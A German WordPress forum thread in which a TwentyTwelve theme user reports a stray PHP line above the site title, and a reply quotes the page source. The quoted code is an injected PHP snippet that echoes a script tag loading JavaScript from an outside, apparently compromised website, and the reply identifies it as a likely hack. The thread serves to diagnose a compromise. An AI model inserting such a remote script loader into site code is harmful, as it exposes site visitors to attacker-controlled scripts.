TwentyTwelve Codezeile über Seitentitel

• [COLOR=#444444][FONT=Open Sans]Hallo,
    ich bin neu hier im Forum und bräuchte mal eure Hilfe...

Und zwar nutze ich das Theme TwentyTwelve und bin soweit auch super zufrieden damit. Leider ist es seit kurzem so, dass über dem Seitentitel oben links in der Ecke folgende Zeile angezeigt wird:
    if(empty($dg)) {$dg = "[/FONT][/COLOR][COLOR=#444444][FONT=Open Sans]";echo $dg;} #/fdd9f2# ?>

[/FONT][/COLOR][COLOR=#444444][FONT=Open Sans]Aktualisiert habe ich das Theme, [/FONT][/COLOR][FONT=Open Sans, Helvetica, Arial, sans-serif][COLOR=#444444]danach war die Zeile auch verschwunden, seit kurzem ist sie aber wieder da und ich habe keinen Plan, wie ich sie dort wieder wegbekomme bzw. wie sie da überhaupt hingekommen ist....?
    [/COLOR][/FONT][COLOR=#444444][FONT=Open Sans]Würde mich freuen, wenn mir jemand helfen könnte. :)
    [/FONT][/COLOR][FONT=Open Sans, Helvetica, Arial, sans-serif][COLOR=#444444]
    Liebe Grüße[/COLOR][/FONT]

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Ein Link zur "Problem" Seite wäre hilfreich ;-)

Nein, dem habe ich nichts hinzuzufügen :-)
    [HR][/HR]

• Im Quelltext direkt unterm Body erscheint folgendes:

Code
    if(empty($dg)) {$dg = "<script type=\"text/javascript\" src=\"http://www.CHARLIEPUPS.COM/wp-content/themes/studio8/vREVyDHt.php?id=89766\"></script>";echo $dg;}
    #/fdd9f2#

Wenn du also keine Beziehung zu French Bulldogs hast, könnte es ein Hack sein, dann such dir am besten professionelle Hilfe.

[size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!